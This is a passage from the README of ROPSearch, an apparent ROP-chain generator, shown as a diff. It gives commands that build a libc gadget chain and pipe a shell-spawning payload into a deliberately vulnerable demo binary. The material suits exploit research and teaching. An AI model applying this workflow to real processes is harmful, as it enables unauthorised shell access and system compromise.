Bogdanisar/ROPSearch/README.md

 Otherwise, you can obtain it directly from an executable file:

 `bin/ROPSearch.exe ropChain -exec /usr/lib32/libc.so.6 --base-address eb3b0000 --buffer-length 100 -t shellNullNull --max-variants 5 --script-file resources/sampleRopChain.py --no-null`

+## ROP-chain for spawning a shell

+You can use the "ropChain" command to automatically generate and pass the payload to a vulnerable process, spawning a shell.
+For example, you can try running these commands:
+- `mkfifo bin/mypipe`
+- `(cat ./bin/mypipe ; cat) | ./bin/vulnerable32bit.exe vulnerable_strcpy`

+And then, in another terminal:
+- `bin/ROPSearch.exe ropChain -pid $(pidof vulnerable32bit.exe) --type shellEmptyEmpty --buffer-length 100 --no-null --payload-file bin/mypipe`

 # "findData" command